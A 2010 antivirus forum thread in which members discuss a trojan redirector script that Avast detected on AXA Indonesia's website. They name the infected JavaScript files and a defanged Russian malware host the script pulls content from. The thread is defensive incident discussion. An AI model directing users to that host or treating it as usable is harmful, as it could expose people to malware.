Author Topic: AXA Financial Website was injected with JS:Illredir-CB [Trj]  (Read 8660 times)

0 Members and 1 Guest are viewing this topic.

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Dear All,

I just got information from my friend that one of biggest financial provider AXA Financial, their website was injected with JS:Illredir-CB [Trj].
avast! was detected there is 3 location was infected :

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/DropDownMenuX.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/ie5.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

And from the summary website scanning tool, this website got suspicious category :

http://www.unmaskparasites.com/security-report/


I need to know where is the exactly location at their HTML script was injected?


« Last Edit: June 08, 2010, 03:07:02 PM by Yanto.Chiang »
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
« Last Edit: June 08, 2010, 11:23:12 AM by Pondus »

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #2 on: June 08, 2010, 07:41:12 AM »
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

Hi Pondus,

Yes you are rite, i just would like to know which part of this website was injected with the script.

cheers,
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #3 on: June 08, 2010, 07:43:38 AM »
not sure, but DavidR or Polonus will tell you when they arrive

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #4 on: June 08, 2010, 07:50:36 AM »
not sure, but DavidR or Polonus will tell you when they arrive

Hi Pondus,

Thanks for your kindly advice,

I need this because if i can contact their web administrator it would be helpful for them.

Since they are core business in financial transaction, i am afraid it would be harmful for other client which related with AXA Financial.

cheers,
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #5 on: June 08, 2010, 09:18:20 AM »

According to Wepawet, at this website found nothing harmful script :

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js

Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

kubecj

  • Guest
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #6 on: June 08, 2010, 12:08:48 PM »
Definitely malware redirector. Wepawet does even find the russian link, but it's down.

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #7 on: June 08, 2010, 02:11:52 PM »
Hi Kubejc,

Thanks for your kindly information and advice.

cheers,
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #8 on: June 08, 2010, 02:48:27 PM »
Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through, suspicious links should be written with wxw or htxp so the curious cannot click them and get themselves infested with malware.

If you analyze there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to CreateElement here:  hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - Could not connect to site?

polonus
« Last Edit: June 08, 2010, 07:59:34 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #9 on: June 08, 2010, 03:08:27 PM »
Hi Polonus,

I am sorry for inconvenience causes, but i already fixed it.

By the way, do you know how to trace the location of those scripts?

Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #10 on: June 08, 2010, 08:17:08 PM »
Hi Yanto.Chiang,

I PM-ed you with extensive instructions how to do this safely and securely,
good hunt,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!